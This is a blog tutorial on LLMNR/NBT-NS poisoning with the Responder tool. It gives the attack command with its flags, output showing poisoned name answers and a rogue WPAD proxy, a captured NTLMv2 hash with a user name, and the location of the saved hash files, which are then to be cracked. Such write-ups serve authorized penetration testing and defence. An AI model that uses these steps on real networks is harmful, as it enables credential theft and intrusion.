Netbios / NBSN spoofing v2

So a while ago I created an article for NetBIOS spoofing. This was years ago and methods change, although still very relevant and will work, things have gotten much easier. 

You can find the older article here: http://inner-tech.blogspot.co.uk/2015/09/netbios-nbns-spoofing.html

 So whilst using the metasploit modules for obtaining netbios requests over the network, i found this to take longer than it needed too and also that i frequently had to look up the commands to remember them.

So i figured, why not take it back a step and find out exactly what Metasploit is doing and either i can find a base script or create something myself.

It turns out, that metasploit actually uses a tool, or likely an edited version of, called Responder.

Responder can be found by default in Kali Linux (or backtrack if your still behind in the times).

The tools is very easy to use

  $ responder -i 10.235.53.132 -f -w -F -v

Lets break this down a little first before we see the intended output.

 
  •  -i 10.20.30.40  The ip address to redirect the traffic to. (usually yours) 
  • -f   This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.
  • -w  Set this to start the WPAD rogue proxy server.
  •  -F  Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. So only use this if you HAVE too.
  •  -v  And of course, verbose mode. 

$ responder -i 10.235.53.132 -f -w -F -v
NBT Name Service/LLMNR Responder 2.0.
Please send bugs/comments to: lgaffie@trustwave.com
To kill this script hit CRTL-C

[+]NBT-NS, LLMNR & MDNS responder started
[+]Loading Responder.conf File..
Global Parameters set:
Responder is bound to this interface: ALL
Challenge set: 1122334455667788
WPAD Proxy Server: True
WPAD script loaded:  function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
HTTP Server: ON
HTTPS Server: ON
SMB Server: ON
SMB LM support: False
Kerberos Server: ON
SQL Server: ON
FTP Server: ON
IMAP Server: ON
POP3 Server: ON
SMTP Server: ON
DNS Server: ON
LDAP Server: ON
FingerPrint hosts: True
Serving Executable via HTTP&WPAD: OFF
Always Serving a Specific File via HTTP&WPAD: OFF


NBT-NS Answer sent to: 10.240.53.162. The requested name was : ISDSN408-SERV06
LLMNR poisoned answer sent to this IP: 10.240.53.162. The requested name was : ISDSN409-EPO01.
LLMNR poisoned answer sent to this IP: 10.240.53.134. The requested name was : wpad.
[+] OsVersion is:Windows 7 Enterprise 7601 Service Pack 1
[+] ClientVersion is :Windows 7 Enterprise 6.1
LLMNR poisoned answer sent to this IP: 10.240.53.134. The requested name was : wpad.
[+] OsVersion is:Windows 7 Enterprise 7601 Service Pack 1
[+] ClientVersion is :Windows 7 Enterprise 6.1
LLMNR poisoned answer sent to this IP: 10.240.53.134. The requested name was : wpad.
[+] OsVersion is:Windows 7 Enterprise 7601 Service Pack 1
[+] ClientVersion is :Windows 7 Enterprise 6.1
LLMNR poisoned answer sent to this IP: 10.240.53.134. The requested name was : wpad.
[+] OsVersion is:Windows 7 Enterprise 7601 Service Pack 1
[+] ClientVersion is :Windows 7 Enterprise 6.1
LLMNR poisoned answer sent to this IP: 10.240.53.134. The requested name was : wpad.
[+] OsVersion is:Windows 7 Enterprise 7601 Service Pack 1
[+] ClientVersion is :Windows 7 Enterprise 6.1
[+]HTTP GET request from : 10.240.53.134. The HTTP URL requested was: /wpad.dat
[+]HTTP NTLMv2 hash captured from : 10.240.53.134
Complete hash is :  STHOMAS13::AD:1122334455667788:6344F3C73245C5EB37F7BBAC4A4809E4:010100000000000085C0C2173692D00152DD5CB148E0F377000000000200060053004D0042000100160053004D0042002D005400423234DF32423AFDSFSDSA23423ASDAS000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C00080030003000000000000000010000000020000029A1E6830C2E5AF89ACE757DFB18819C4C5A1F7C8E2AD95511B4C6893CF34CD70A001000000000000000000000000000000000000900120048005400540050002F0077007000610064000000000000000000
[+]WPAD (auth) file sent to: 10.240.53.134

Once you have obtained a whole bunch of these hashes, they can be found in:

$ cd /usr/share/responder/
$ ls
HTTP-NTLMv2-Client-10.240.53.134.txt
SMB-NTLMv2-Client-10.150.100.120.txt
Now it is just a matter of cracking these hashes. Which can be done using your prefer cracking methods. I will be creating and linking to these methods in future posts.



Comments

Post a comment

Popular posts from this blog

Null Session Domain Controller Enumeration

MS15-034: Vulnerability in HTTP.sys Could Allow Remote Code Execution

NetBIOS / NBNS Spoofing